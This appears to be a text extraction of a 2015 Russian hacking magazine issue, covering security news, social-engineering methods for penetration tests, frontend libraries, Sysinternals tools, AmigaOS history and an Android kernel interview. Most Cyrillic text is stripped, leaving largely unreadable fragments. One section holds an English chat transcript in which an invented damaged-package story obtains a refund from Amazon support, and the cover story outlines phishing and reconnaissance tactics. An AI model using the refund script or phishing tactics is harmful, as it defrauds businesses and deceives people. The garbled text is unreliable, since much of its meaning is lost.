Upload
vasya-pupkin
View
1.639
Download
58
Embed Size (px)
Citation preview
4
197
2015 630
Cover Story
. 10
06 (197) : 03.06.2015
. , Windows 95 . - . - . - . - , -. , - .
, ? , : - 46 800 00 . - . 20 (2) . .
, - , -. , . , - .
Stay tuned, stay ][!
, ][@IlyaRusanen
: [email protected]. : 115280, , . -, . 19, . : : 606400, ., -, . , ., . 13. : , 614111, , . , . , . 26. , (-), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101 Kouvola, . 96 500 . 630 . . . , - , . . - : [email protected]. , , 2015
PC ZONE [email protected]
ant
UNITS
UNIXOID SYN/[email protected]
Dr.
MALWARE, , PHREAKING
X-MOBILEexecbit.ru
-
DVD
ant
shop.glc.ru, [email protected]
([email protected]) : , 109147, / 50
PR-
16+
2015
197
004 MEGANEWS
010
014
016
020 AMAzoN
022 froNtENd -
024
028 filEMAkEr Pro 14 iOS
032 Parallels Access 2.5
034 AmigaOS
040 , Android- franco.kernel
044 SqlitE root
050
051 #8. APK
052 EASy HAck
056
061 tor:
066 rSA coNfErENcE 2015 IT-
072 ,
074 MITM-
078 WPAd WPAD
082 X-toolS C 084 ][-: iNtErNEt SEcurity McAfee Total Protection, Microsoft Security Essentials
090 WIM, CSRSS, EMET, CCMP, EFS, SEHOP, ASLR, KPP, UAC, DEP -1
094 Carbanak Equation 11
096 ANdroid
102 API
106 CUSTIS DZ Systems
110
116 : Debian 8
122 IDS/IPS Suricata
126 MS SQL Server
130 Bro
136 Razer
140 fAq
144 WWW -
Microsoft - Windows 10 , - . - .
- ,
Project Spartan. - Edge, - -, . , Spartan , , Microsoft -. , , - E. Internet Explorer, . Microsoft , IE - . IE Windows 10 , - . - . , . , Microsoft , Edge Google Chrome Mozilla Firefox. ,
, , -. Microsoft Bounty Programs. - 500 15 .
- -. , , Windows 10 Android iOS, . Microsoft , -, , - , Windows. SDK. Android- Java C++, iOS- - Objective-C.
-. Microsoft Open Technologies, -, Microsoft Open Source, Linux Windows. Microsoft , - , . , - .
Meganews
Mifrill [email protected]
Internet Explorer
Edge .
windows 10 Microsoft
Microsoft -
Windows 10
.
,
-
Windows 10
- . -
200
Windows 8.
oogle , YouTube. , , . YouTube . . -
? , . - , . Google -: . , Google . , , .
, Google YouTube API v2, 2008 . , YouTube API v3. -, API- v2, . Google , - API v2 , 2012 , Google TV, iOS, Blu-ray- Sony Panasonic. -, - XML. , .
YouTubeGooGle
g
Cyclance - , - - Windows,
. Microsoft, -. Adobe Reader, Apple QuickTime, Apple Software Update, Internet Explorer, Windows Media Player, Microsoft Excel, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus .
, , - Redirect to SMB, - 1997 ! Server Message Block. , SMB- , / . Windows API (URLDownloadToFile, URLDownloadToCacheFile, URLOpenStream, URLOpenBlockingStream) HTTP/HTTPS SMB, URL file://1.1.1.1. Microsoft , - TCP 139 TCP 445.
-- WindoWs , 18
C
, . , , , , . .
API v2
, , ,
Google .
06 /197/ 2015 5
, . - , -
. - (, ) -. , .
Computer-Human Interaction Yahoo Labs Bodyprint. Bodyprint , - . , , , -. , Yahoo , , . , . - , - , , .
Yahoo
Bodyprint
.
-
,
: -
,
99,52%.
- . WikiLeaks 173 132 2000 30 287 Sony Pictures Entertainment. . Sony. - , .
RSA Conference - . POS-, - 1990 , . . : 166816 ( Z66816, ). , - , , , , - Verifone.
166816
173 132 -, - , . ,
, - . - , - - , .
LIVE Plus
06 /197/ 2015MEGANEWS6
GitHub . , -
(Great Canon), - .
- Citizen Lab, , - GitHub, Greatfire.org, DDoS GitHub. Citizen Lab, , man-on-the-side - . . , GitHub Baidu.
GitHub Google, Safe Browsing. , -, , . 1 15 2015 , Baidu 3 2015 , 7 . -
- ,
TLS, , Google - GitHub.
. -, 3 6 , IP- 114.113.156.119:56789 -. 14 , d3rkfw22xppori.cloudfront.net. HTTP, HTTPS. 18 *.cloudfront.net , . 25 Cloudfront . GitHub. github.com/greatfire/wiki/wiki/nyt/, github.com/greatfire/ github.com/greatfire/wiki/wiki/dw/.
JS. 995 1325 . : cbjs.baidu.com (123.125.65.120), eclick.baidu.com (123.125.115.164), hm.baidu.com (61.135.185.140), pos.baidu.com (115.239.210.141), cpro.baidu.com (115.239.211.17), bdimg.share.baidu.com (211.90.25.48), pan.baidu.com (180.149.132.99), wapbaike.baidu.com (123.125.114.15).
, Google - , : TLS, .
GiThub
Loggy GitHub, -, -. , ( 70% ) - 2012 - 2014 .
Citizen
Lab ,
-
-
,
.
06 /197/ 2015 7
, , , - , , . , , ,
, . 2013 ,
Minecraft DoS-. - , . - Mojang . , . , 1.6.2. 1.8.3, - - . (blog.ammaraskar.com/minecraft-vulnerability-advisory).
0x08: Block Placement Packet 0x10: Creative Inventory Action. , , - , 30 . - Java-, ArrayLists, . , , CPU - .
, -, Mojang .
,
? Trend Micro Ponemon Institute ,
, -. 1903 18 .
, Google - Google Play, , , -
. - Google Play adware, Android -. : ( - , - ), - , . Adware.MobiDash.2.origin - Adware.MobiDash.1.origin. , -, , .
, , , , - Google Play, . Android.Toorch.1.origin. -. , , - . , root- , - .
android-
GooGle Play - , 100%
MinecrafT
, -, ?
63% .................61% .......53% ..........49% ....................23% - ,
-
- -
- , -, -
- -
- ?
75,8 59,8 55,736,0 29,2 23,5 20,6 16,112,9 12,2
(GPS)
$
( )
06 /197/ 2015MEGANEWS8
, - Nero,
. WebMoney -
-... .
WebRTC, Chrome, Firefox Opera. , -
: ?
- . Google eBay, AliExpress
, - .
, ( )
.
, - , Stack Overflow.
,
, : ru.stackoverflow.com. , ,
, , . - - 30 .
,
. - - MP3- -. ,
, - .
, MP3 - :).
, Joomla WordPress, - ( WordPress, W3Tech, 23,9% ). . CMS
. , -, - CMS .
WordPress : . , , - . WordPress 4.2 , , Klikki Oy. , , - (64 ), , - HTML-. , , . - :
WordPress Foundation , , - CMS.
, , , . WP-Super-Cache, HTML - . (XSS). , -. , Sucuri : 8 10 . , .
. , , , WordPress, - RevSlider, Gravity Forms, FancyBox, WP Symposium MailPoet. WordPress Foundation - .
wordPress cMs
, WordPress 4.2,
. ,
.
06 /197/ 2015 9
-,:-.,-.--.
,.
06 /197/ 2015Cover Story10
-. , 1906 - . . .,-.
, --,-..-. ,-.
. --,- . -.-.
PwnieExpress.-,,,. X: -,-.- . DEFCON.
,,- ( !), . -.-.
- -.!. USB-.,,,.
.,,.,?
, -.,,, -.. . , , , ., . , .
, -,-.,.-,-.
-,.,,.
. ,.,, . , -,- . ,-.
, , ..!-,,,- , , ,. . - .
,-.,,.?. -email,- , -.
-- . , ,- . ,,-.
INFO
- .
, .
.
-
.
06 /197/ 2015 11
.,- Social-EngineerInc., . , -.-, , - . , ,,-.,,.
! -. , ,-, . .LinkedIn., ,.-.Twitter.Foursquare- -..
GlobalDigitalForensics-., Facebook ,.- , :!!-,,-,.
Keep it simple!,-, .Solutionary,,,-.
-,.,.--:-. XX.
, . ,,-,,-.
-. . -, -.,.-,.,-. ,.
-, --GeneralDynamicsFidelisCybersecuritySolutions.-.
- (SSLVPN)- . email :-- . , .,-..
.60%-.-,-75%.().
- , ,ComputerSciences Corporation. , -,-. , ,.
-.,DHS.-,.
60%-.- 90% .
WWW
IDG
:www.csoonline.com
:
is.gd/OtQtwX
--.,-,--
06 /197/ 2015Cover Story12
,,-.
- . ,-ILOVEYOU2000.- - .BlueCoat,-BainCapital.
BlueCoat,., .,-.
,.- Girlsof the IsraelDefenceForces. ,.
-.ReverseSE. , - , ., . -, , .
. -.,-,.-,-.,-. -, .,-.
?, - . , - . The SecurityAwareness 25 . . --.-,..-
:-,, , .
!-.-,,.- 1200 ,-.
, - -,-(!)., . - , . -.
,-- - , ,.:,- . , , -.-,. -, .,XXI-.
, .-- . ,.,-.,-.,.,.(!)-.
: ,- , . .
,,-.,-,,.
, - , . , - , ,.,,,- , ..
WARNING
-
. , -
, -
.
1200-
,
06 /197/ 2015 13
-.
,-.,,.-
,..
14 Cover Story 06/197/2015
, -,?,-,.
,. , -LinkedIn.-:,()-.:(),-,-.,,,-.,(,)-..
, .,,-.
,- . ,,-(-,)..
, , , , , .Facebook,Google+,Tumblr(,,,),GoogleImages(),Twitter(),Pinterest,FlickrInstagram(-,),Ask.fm(),Meetup(- ) . , .
, Foursquare, iCloud (, iCloud ). - .: spokeo.com ;city-data.com ;whitepages.com,,,.
.--.Maltego,.-.
Maltego CaseFile. .CaseFile
, CSV,XLSXLSX.
Ghostery.-,Maltego . Ghostery ,.
- , . ,, , .,,,,- . , , , . , , -, . ,.
. Whois (IP, -). BuiltWith.-,-,SSL,,-JavaScript-.,,.
,--,,- -.
. --Google , (-).
, - Rivalfox, - : Facebook,Google+, Twitter, Instagram - ( -).FalconSocial, .
-, -,!
Maltego
Ghostery
WARNING
-
. , -
, -
.
06 /197/ 2015 15
- SQL-. , Advanced Persistent Threat (APT) - , .
- , -
.
Positive Technologies
16 Cover Story 06 /197/ 2015
, - , - . -
: , , .
/READY , , - . ?
. .
? , , - .
-? , .
? -? : , . - - !
? ? ? , - - , ?
? , , -, . - , .
: , , , .
. , - , .
, , , , , , , . .
. , . standalone Metasploit. - , - FOCA MALTEGO. , SMTP- - VRFY/EXPN .
, -. . - ; . - , - !
, , - , - . . -
, ( - ) , . - - , .
/STEADY . .
. -: , - .
, , , -. - : -
; , -
. , ;
, -. , Bad USB, Teensy .
: , -
, : , ;
SMS MMS, - , .
.
-
- . , . -, . , , SSRF
callback Reverse DNS. . : 100, 90, . , , , , .
, (- ).
. , !
SMTP relay ( ) - .
, XSS/RCE . . -, .
. - . , , , , , .
WARNING
-
. , -
, -
.
06 /197/ 2015 17
: -, , , - . APT .
, , - : - - .
, - , - , -. . - : - , , .
, - . . , -: , , , , .
, , - . . , , - , - .
, -. -: , : l i, o 0 . - , , . , - , - . , - , .
: SMTP- relay. SMTP. - 25/465 sendmail . , , - - : Reflected File Download, Open Redirect, XSS RCE SQLi , HTML . - . - , - .
: , - . . -! ( HTTP, DNS, ), , ( ), , -, . -
. , .
/GO : , - . , ( , ). , - .
: , . - , .
, , , - , . - , ( - ). , - , . - , -. , , , - .
ptsecurity.ru.
Positive technologies
WWW
-
(blog.didierstevens.com).
. - - Threatpost. com.
- ,
06 /197/ 2015Cover Story18
, -. , .
/ FINISH HIM! - - VPN, RDP, . , .
Positive Technologies - , - . 2014 , , , -, - , 15%. . , ( ).
15% ? . .
? , - , . - .
: , , - . , - .
- ( - , - ). , - . - : , , , . , - . , - : SMS .
, - . -, .
84ckf1r3 [email protected]
- . - , - , . - , , .
IQ , , - . , - , , , . DDoS- .
- . - , - .
- , , : - , - . , , , .
, - , - . , , - . -, .
-. - , . - .
- -
- . - -, , , (, , - , ), ( - , , -, , - ). - . - , - .
- : ( - ) , - - , , . - .
-
-
-
. -
06 /197/ 2015 19
- Amazon , - , ,
.
AmAzon
Kaimikaimi.ru
- , - , BlackBank Market. -
, , , , Amazon.
. , , Ships from and sold by Amazon.com Fulfilled by Amazon ( - ), 1500 ( - ), - . : , email Amazon, , , , , .
, -, Deep Web, - , , , .
, ! , --. - - , - . , -, , .
? - , - Amazon. , , . Amazon, VCC (virtual credit card) --, . - Amazon. , . . - .
20 Cover Story 06 /197/ 2015
You are now connected to Amazon from Amazon.com.Me: Hello, several days ago Ive ordered a gift for my friend for his birthday. Ive received it, but order package seems to be damaged.Amazon: Hello Bob, thanks for contacting Amazon, my name is Alice.I am so sorry to hear about this.Please allow me a moment to check on this for you, Ill be happy to assist you.May I have the order number you are referring to please?Me: Order number is ###-######-#######Amazon: Ill be happy to help you with this, but first we would need to go through a quick security verification in order to access your account. May I have the email address, the name and the full billing address on your account please?Me: E-mail: #####@hotmail.com; Name: Bob Smith; Address: Sample Street 1150 15, NW Washington DC 20071.Amazon: Would you mind if I take a moment to check on this for you? It will take a few minutes.
, , , - ( , Amazon).
Amazon: Our best option in this case would be to issue a refund associated with a return. Or a replacement associated with a return. Also I can upgrade to the fastest shipping available.
, , - , . .
Me: Sorry, but I cant return the package. It turned out that it was damaged and inside of the box everything is covered with something like black tar, so I throw it away, because it doesnt seem to be normal and can be dangerous.Amazon: You can put the whole package in any big-ger box and send it back for a full refund.
- .
Me: I understand, but Im saying that Ive thrown away the package, because this tar can be danger-ous for health. And as Ive mentioned before, it was a birthday present for my best friend. I cant wait for replacement and such stuff, Id rather try now to buy something at local store to catch the beginning of birthday celebration.Amazon: OK. I will issue the item refund for you. One moment please.Me: Thank you understanding.Amazon: Sorry for waiting, Ive requested the refund, you'll see the refund back to your origi-nal payment method within 23 business days. Ill also make sure to send you a confirmation regarding todays solution.Me: Thank you!Amazon: You are very welcome! If there is anything else I could help you with today?
! . , - , , .
, , - , .
, - , . , Amazon - - .
, : ( - ) , , - ( -, ).
? , , , , , , . Amazon , - . , , , , , , .
,
-
-
Amazon
WARNING
-
. , -
, -
.
06 /197/ 2015 Amazon 21
Frontend -
ipestov.com
ExpandJS
www.expandjs.com , -, . - . , -, HTML-, .
ExpandJS. -, 80 - 350 JavaScript- . Material Design, .
:
Form factor: {{type}}Mobile device: {{mobile ? 'yes' : 'no'}}
:
... ... ... ...
Ramjet
https://github.com/rich-harris/ramjet , - - . SVG, DOM- - . Ramjet - easing- -:
a
b
// to repeat, run this from the console! ramjet.transform( a, b );
, - , . GitHub , - -. , .
Electron
electron.atom.io NativeScript React Native - -. Electron, - HTML, CSS JavaScript. Electron, Atom Shell, GitHub. , , , - . io.js Chromium. , - Atom, - , Docker, Slack, Facebook, Microsoft. , : Electron Windows-.
jQuery.my
https://github.com/ermouth/jQuery.myjQuery.my - . - , , . jQuery.my Query UI, Select2, CodeMirror, Ace, Redactor, CLeditor, jQuery Mobile .
var data = { name: "Luke Skywalker", age: 46};$("#form").my({ui:{ "#name": "name", "#age": "age"}}, data);
06 /197/ 201522 PC ZONE
var camera = new pc.Entity(); camera.addComponent("camera", { clearColor: new pc.Color (0.1, 0.1, 0.1) }); // Create directional light entity var light = new pc.Entity(); light.addComponent("light"); // Add to hierarchy app.root.addChild(cube); app.root.addChild(camera); app.root.addChild(light); // Set up initial positions and orientations camera.setPosition(0, 0, 3); light.setEulerAngles(45, 0, 0); // Register an update event app.on("update", function (deltaTime) { cube.rotate(10 * deltaTime, 20 * deltaTime, 30 * deltaTime); });
Playcanvas
https://playcanvas.com/ . -, Playcanvas JavaScript c WebGL 3D , -, Maya, 3ds Max, Blender. -, . - -, - GitHub.
// Create a PlayCanvas application var canvas = document. getElementById("application-canvas"); var app = new pc.Application (canvas, {}); app.start(); // Fill the available space at full resolution app.setCanvasFillMode(pc .FILLMODE_FILL_WINDOW); app.setCanvasResolution(pc .RESOLUTION_AUTO); // Create box entity var cube = new pc.Entity(); cube.addComponent("model", { type: "box" }); // Create camera entity
Clusterize.js
https://github.com/NeXTs/Clusterize.js . - 500 - . Clusterize . - , - -, . : WebKit/Blink 134 217 726 px; Gecko 10 737 418 px; Trident 17 895 697 px.
// JavaScriptvar data = ['', '', ];var clusterize = new Clusterize({ rows: data, scrollId: 'scrollArea', contentId: 'contentArea'});
Globalize
https://github.com/jquery/globalize , - Node.js . Globalize , . Unicode CLDR JSON, i18n.
Vault
https://github.com/hashicorp/vault , - Go. Vault , , , API . API : HSMs, AWS IAM, SQL . - , , - , , Vault.
Egg.js
thatmikeflynn.com/egg.js , , - . UX- . , Egg.js , - .
var egg = new Egg();egg .addCode("up,up,down,down,left, right,left,right,b,a", function() { jQuery('#egggif').fadeIn(500, function() { window.setTimeout(function() { jQuery('#egggif').hide(); }, 5000); }, "konami-code"); }) .addHook(function(){ console.log("Hook called for: " + this.activeEgg.keys); console.log(this.activeEgg .metadata); }) .listen();
JSON Server
https://github.com/typicode/json-server -, - JSON. - REST API .
db.json:
{ "posts": [ { "id": 1, "title": "json-server", "author": "typicode" } ], "comments": [ { "id": 1, "body": "some comment", "postId": 1 } ]}
JSON-:
$ json-server --watch db.json
localhost:3000/posts/1, :
{ "id": 1, "title": "json-server", "author": "typicode" }
06 /197/ 2015 Frontend - 23
. . ,
-.
bonumopus@
shuttersto
ck.com
WARNING
- - . ,
.
WWW
SysInternals
73 :is.gd/DuTDyN
NirSoft 56 :is.gd/GmkDwW
AVZ:z-oleg.com
06 /197/ 201524 PC ZONE
Autoruns Winternals Software ( - Sysinternals.com), Microsoft. - - , - Microsoft. - 13.3 2015 . v.13.0 , , -, .
Autoruns . - -, ( ) . - Windows, , - , .
, - Microsoft, , . - , .
- . Autoruns , .
. - , . (is.gd/0TQ6Ye), :
autorunsc -a blt -vrs -vt > C:\Autor.log
autorunsc , . -a , . : b boot execute ( , -), l logon, - t . blt (*), .
-vrs -vt VirusTotal.
, Microsoft . , - . , - VirusTotal - .
Autorunsc ( ), -. -. UCS-2 Little Endian. - :
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunAdobe ARM"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"Adobe Reader and Acrobat ManagerAdobe Systems Incorporated1.801.10.4720c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe20.11.2014 21:03VT detection: 1/56VT permalink: ( VirusTotal).
Autoruns : is.gd/0TQ6Ye.
Autoruns
, VT
06 /197/ 2015 25
- , . - - .
Process exPlorer Autoruns Process Explorer (PE). PE, Autoruns, - .
PE : - . , - ( ) VirusTotal. , . , -, .
, . - , , , - /, . - . , . , () . .
PE . - . , - VirusTotal, , (suspend) -. - ( ), -. , Process Explorer (resume). -, , -. BIOS/UEFI, .
- , -. - , - . Process Explorer . , , . PE .
Process Explorer, - ( ) Debugging Tools for Windows. (is.gd/flp0WS) Windows Driver Kit (is.gd/TURLrM). Process Explorer Microsoft (is.gd/VR6CwF).
, Torrent Process Explorer
- Safari
unlocker , Windows, . . , -, (Cedrick Collomb). Unlocker : - , . 2013 , - . , - , index.dat, Windows .
Unloker , - . .
06 /197/ 201526 PC ZONE
. , .
. AVZ ( ) .
. Unlocker, AVZ Boot Cleaner. , Windows . , , .
AVZ -. NTFS , - Microsoft . , - HackTool. - , - . AVZ - .
AVZ -, .
- , . .
AVZ AVZ, , . , - -. , , - , , SPI Winsock , .
- . AVZ , , , - . AVZ - .
AVZ , - , AVZPM . - , , - .
AVZGuard , AVZ. ,
AVZ
Unlocker ,
, -.
, . Unlocker , - . - Win32 API, : -, .
, . Unlocker .
1.9.0 64- Windows. - . Unlocker Assistant. - Unlocker , - . -h
AVZ
06 /197/ 2015 27
FileMaker Pro 14 iOS
Frannya
nne@sh
uttersto
ck.com
06 /197/ 201528 PC ZONE
Microsoft Access . . ,
, , . , , - . -, Access FileMaker Pro 14.
Access, FileMaker Pro - , ( , . , , FileMaker Server). FileMaker Pro , .
, , - (, , Windows 8 OS X 10.10) . , - .
FileMaker , Access, -. . - MS-DOS, . Apple , FileMaker . , Microsoft - . Access - .
FileMaker . - , - Mac OS. FileMaker Pro - , OS X ( Windows, , ). , - , : , - . FileMaker Pro , .
Access -, , - , FileMaker Pro -
. - , . FileMaker Pro -, .
- iOS. FileMaker Pro , iPhone iPad. , , , - . , , FileMaker Pro - .
FileMaker Pro 14. - (Layout) , , -. FileMaker Pro Access. , . - , -. ,
Filemaker Pro 14
.
Windows
FileMaker Pro 14
data-driven . Microsoft Access, - . FileMaker , -. iOS.
06 /197/ 2015 FileMaker Pro 14 29
, , PDF.
, (Browse), - . - FileMaker Pro , , .
. (Find) -, , , - .
, , . - Manage, . Manage Database, - : Tables, Fields Relationships. , , , . , , , .
CRM - . , . , - : , .
, : Calculation Summary. , , -, . Options - , , , .
Relationships , (foreign keys), , - FileMaker Pro, (match fields). - : - , - , . - , .
Manage Database, , FileMaker Pro -: . , : . -, . .
- . , , .
. FileMaker Pro - , . ( , ) . iPad, Enlightened Touch. - , .
. , , - , , . , , , - , . - .
- . ( ) ( , ). - : , - , - .
, . : - . .
-
.
-
,
.
,
-
. -
-
.
FileMaker Pro 14
06 /197/ 201530 PC ZONE
, -.
. , . - , . . - , - . - , . .
. ( , - , ) - iPad. (File / Share with FileMaker Pro Clients), -.
, - iOS, - , , , , .
- - c . , - .
, - , - . . - : , -.
-, . FileMaker Pro , , , . - , , , - , . ?
-. , ( - ). : , -. , FileMaker Pro , : - = ::. !
. : - FileMaker Pro. - , - , . .
, -
-
iPad
06 /197/ 2015 FileMaker Pro 14 31
- -, Parallels Access . - , - . - .
Parallels access 2.5
, Parallels Access, , -. OS X VNC, - ,
- . , ?
Parallels -, . - , ( Windows). - - .
, Parallels Access ( iOS, Android). ,
, . . , , - , , - -, ( , - , , ).
, -. : , , -, Launchpad. , , . : . Access , .
.
,
06 /197/ 201532 PC ZONE
? : -, , Photoshop, - . - . - . Photoshop , .
Parallels Access - . 443- (HTTPS), . - Parallels , , IP- - . Parallels Access access.parallels.com, - .
, Parallels Access . - 650 . , , - , .
, Parallels Access . - , - , . , .
, - Parallels Access . - - , . Parallels Access , - . , . , , , , - . , , , - .
- , . : , Launchpad, , . Parallels Access.
. , Parallels Access - , , . - iOS Android: .
, - . - , . -, , Windows Finder - . : . , . Parallels Access - .
, - Parallels Access -. . - ! , Parallels Access . . , World of Warcraft, : , - , -. , . , -, VNC.
, Parallels Access . , -
, !
,
Photoshop -
!
,
-
-
, -
06 /197/ 2015 33
AmigA CorporAtion. - . -: , . , -
- .
Amiga Corporation . (Jay Miner), Atari. - 8- , Atari 2600 Atari 400/800. Atari , - , , - , .
- . - , Motorola 68000, Atari --, , , .
(David Shannon Morse) - Tonka Toys, . - Lorraine ( ) - .
- 32- Motorola 68000. , , - - - . Motorola 68k Apollo Apple Macintosh . , - - . Lorraine , Apple Macintosh, ( ).
Lorraine - . , --
1985 Commodore Amiga AmigaOS. - -, -. , .
AmigAOS
06 /197/ 201534
, - - , . (DMA), - , -. ? , - ( 640 256 4096 ) ( - ) Dual Playfield ( - -), c . - 8- - 14- .
Lorraine 1983 - . - CES - . - Boing Ball , Amiga, AmigaOS.
Lorraine - , OCS Original Chip Set. : Agnus DMA, - ( 2D-), Denise , - , Paula . - , - Lorraine. , , Atari, - Lorraine 16- Atari ST, Commodore, -. Commodore - Commodore Amiga 1000 - Motorola 68000 OCS.
AmigAoS. OCS - Amiga 1000 , , , , Commodore - . NTSC PAL - .
. - AmigaOS, Amiga 1000,
Agnus, Denise Paula. , , . software engineers (R. J. Mical), (Dale Luck) (Carl Sassenrath).
OCS. CES Boing Ball , -
-
Lorraine
Blitter Copper
Agnus
Dual Playfield
-
-
,
,
Amiga. -
AmigaOS
Amiga
OCS
Agnus, Denise
Paula -
Commodore
Semiconductor Group
06 /197/ 2015 35
. - Motorola 68000 - Blitter Copper Agnus. - .
Amiga 1000. - . UNIX- - . , - . ( , - !), , - .
: - , . (runtime libraries) , . - - Exec , - AmigaOS, -, , - , - ... . SassenRanch : Exec AmigaOS .
runtime- Amiga 1000 -, Exec. , - Commodore. graphics.library intuition.library , - .
. Agnus Denise graphics. - OCS, , , graphics.library . - intuition.library - , , . - intuition Amiga Graphicraft, Musicraft Textcraft.
1985 Commodore Amiga 1000 ( . - : ) Commodore
, . , - AmigaOS ( ) - , Commodore MetaComCo, - TRIPOS - (DOS), - , Motorola 68000. AmigaOS - . - TRIPOS . TRIPOS dos.library. AmigaOS : TRIPOS BCPL (Basic Combined Programming Language) , (, - Hello, World BCPL).
AmigaOS dos.library - . Exec dos.library runtime-, - . , dos.library, . dos.library, ,
AmigaOS
-
,
-
AmigaOS
Exec
1985-
NT-
Windows
AmigaDOS -
INFO
AmigaOSRAMdrive.-
-.(PerryKivolowitz),Amiga,-.RRD(RecoverableRAMDisk)RAMdrive,
reboot.
06 /197/ 201536
AmigaDOS , - AmigaOS.
, AmigaOS . Motorolla 68000, , - MMU (Memory Management Unit), - . , . -, . AmigaOS , . Guru meditation , AmigaOS .
AmigaDOS runtime- , Exec , - , , , . - ( -) devices.
, AmigaDOS trackdisk.device, floppy- (, , scsi.device). intuition input.device, , -, keyboard.device, serial.device gameport.device. AmigaDOS intuition console.device.
KiCKStArt WorKbenCh. , 2, - AmigaOS . -- Kickstart. PC - BIOS IPL. - Autoconfig. - . , - , . PCI plug and play, , - Autoconfig.
- - Exec. , AmigaOS, - (0000$
AmigaOS Exec -
,
WWW
AmigaOSHyperion
Entertament:www.amigaos.net
-
Amiga:www.amigahistory.co.uk
AmigaOS-
:aminet.net
Amiga:ada.untergrund.net
LorraineCES
1984:https://www.youtube.com/watch?v=nLcpn1_
IY1A
SarewareMUI:
www.sasg.com/mui/
opensource-AROS:
aros.sourceforge.net
MorphOS:
morphos.de
, -
-
Kickstart ROM-
-
Amiga Workbench
,
Boing Ball
craft
Graphicraft
Textcraft
Workbench
06 /197/ 2015 37
0004), SysBase, Exec. , Exec - devices, - runtime , . , , , - . - Exec , , - . , - .
Amiga, 3,5- , Kickstart - AmigaOS . - ROM, Kickstart. AmigaOS - Kickstart.
- , Amiga softkickers, - Kickstart. , , - ( ), - .
AmigaOS , intuition, AmigaDOS - . - - !
- Insert Amiga Workbench. , Workbench, , -... , , , , , (), - ( ) crafts (). , , . Workbench Finder Apple Macintosh GEM, - CP/M Atari ST.
, . , 1.0 Workbench . , , . Workbench ,
AmigaOS , Amiga Workbench.
Workbench - . Workbench , GUI - .
- Amiga AmigaOS. (Stefan Stuntz) - MUI (Magic User Interface), AmigaOS -.
AmigAoS. , - , - AmigaOS, IBM PC? - Commodore . - , Amiga, -, - . , .
Commodore PC. , OCS , . Motorola - Intel, ECS (Enhanced Chip Set) Super Angus Super Denise .
- - . OCS AGA (Advanced Graphic Architecture) 262 , . Amiga 1200 Amiga 4000 AGA NTSC PAL - - . , - -5 - .
AmigaOS - . - MS-DOS , Windows . -
-
MUI
-
Workbench
INFO
2001-Amiga.:,,Amiga3000.3D-VistaPro,-
-
.
INFO
Workbench1.2-.,
-AltShift-F1-SystemSoftware:Carl,Neil&Kodiak.
F2
:GraphicsSoftware:Dale,
Bart,Jim&=RJ=.
06 /197/ 201538
, NT AmigaOS: Executive - DLL-.
Commodore, AmigaOS - , - . , : Amiga , .
Amiga AmigaOS, - . 2005 AmigaOS, PowerPC. Hyperion Entertament, AmigaOne, - , PowerPC - Pegasos II.
AmigaOS 4.x - Amiga, AROS (Amiga Research Operation System) . AROS
AmigaOS, 3.1 API. AROS - , AmigaOS, Commodore Amiga. , . Macintosh Operation System, Motorola PowerPC, Intel UNIX BSD. AROS AmigaOS - Intel x86-64, Motorola 68k PowerPC, - Linux, FreeBSD Windows host-. AROS - Zune MUI - .
AmigaOS MorphOS. Phase5 Digital Products, (turbo-), Amiga. (Ralph Schmidt) (Frank Mariak), PowerPC. - -. , AmigaOS - , AmigaOS, - . - . MorphOS Quark, - (boxes).
, ( ) MorphOS, A-Box , - ( ) AmigaOS. Q-Box, , - , OS X FreeBSD, PowerPC.
, , , - AROS MorphOS, - , Amiga . - . , . , , , - . , , - . - AmigaOS.
Open source
AROS -
AmigaOS,
MorphOS
AmigaOS -
.
Quark
MorphOS -
MUI -
. AROS,
Zune
06 /197/ 2015 39
(Francisco Franco) - Android-, - franco.kernel Nexus FKUpdater. -, - - , - - .
, Android- frAnco.kernel
androidstreet.net
BRADA
06 /197/ 2015X-Mobile40
, , Nexus, . , - , , , franco.kernel , , . , - franco.kernel - - Nexus .
, , , - , - , . .
. -5 - , - ?1. , .2. - -
. .
3. .4.
.5. .
, . . , , - Android.
--: - CloudCar, Android Auto, 2014 - 2014 .
, Linux - . - Android LG P500. - , /sys /proc, - .
Android 2.2, - . Dalvik RAM-, - . Dalvik , . , - Dalvik /cache .
, , -
-
, : - Linux- Android- , -, -, . - ( ) , , franco.kernel.
CPU
FKUpdater: CPU GPU
06 /197/ 2015 41
, -. , Linux- , - - , . -.
Huawei X5. Qualcomm high end , 800 2000 . -, Nexus S, Galaxy Nexus. - FKUpdater. -, .
? , - - (governor) - ( ). - - . - (, ), .
, , - Nexus 6. 1,5 , -. , . , - . .
? -, Interactive Conservative 10 (0,01 ), - . , - 1,7 , , 40 (0,04 ). , 40 - , - ( 60 16 ).
, MPDecision. - .
, Conservative?
Interactive Conservative. , , Google, - Qualcomm ( - Snapdragon 805). -, , Conservative, , Ondemand, - .
InteractiveX, - leanKernel, ?InteractiveX Interactive - ( ). , , - Interactive Ondemand . -, , .
. - ? . - . - , X Y , .
, - , ? ?, , doubleTapToWake (- . . .) / , - - . , doubleTapToWake - , One Plus One Nexus 6, (, ).
, , Linux. - , - , .
CyanogenMod? CM, - , , , - . , Nexus 7 2012 , Nexus 5 6, , CM. Nexus 4 Nexus 7 2013 , - CyanogenMod.
Android ? -? userspace-, , Android ( ).
--,,-InteractiveOndemand
,---MPDecision
06 /197/ 2015X-Mobile42
, , ioctl. -, - . , - , ioctl, . ( ).
API. , . Android , (, -, ) , - .
, CyanogenMod, - Nexus 4. Android 4.3 CyanogenMod HardwareComposer, , .
- , - . C ? - , . , , - . GSM- , .
... - . HTC One M8. Wi-Fi . -: OEM-
Google , , - . -.
, Nexus 4, - - . Qualcomm , .
- , -, , ? - , - Nexus 6 . , .
Nexus OnePlus One? ? ( , Google, Motorola Cyngn - ). , , .
? - , -.
? - ?, , Imoseyon ( leanKernel, - franco.kernel. . .) - . CodeAurora ( Qualcomm. . .) .
FKUpdater Google Play?, FKUpdater. - , 2011 . - . FKUpdater , , .
. . .
FKUpdater, : Peek , Active Display Motorola.
: , , ;
Per-App Modes - . , , GPU , , . root - ;
Servicely . Servicely, -, (, ). Servicely . -, ;
Nexus Display Control , RGB . Galaxy Nexus, Nexus 4 Nexus 5. ( franco.kernel);
Simple Reboot - (recovery, bootloader, etc.);
Simple CPU Monitor Extension DashClock, .
GooGle Play
,-,-
06 /197/ 2015 43
Andy Frith
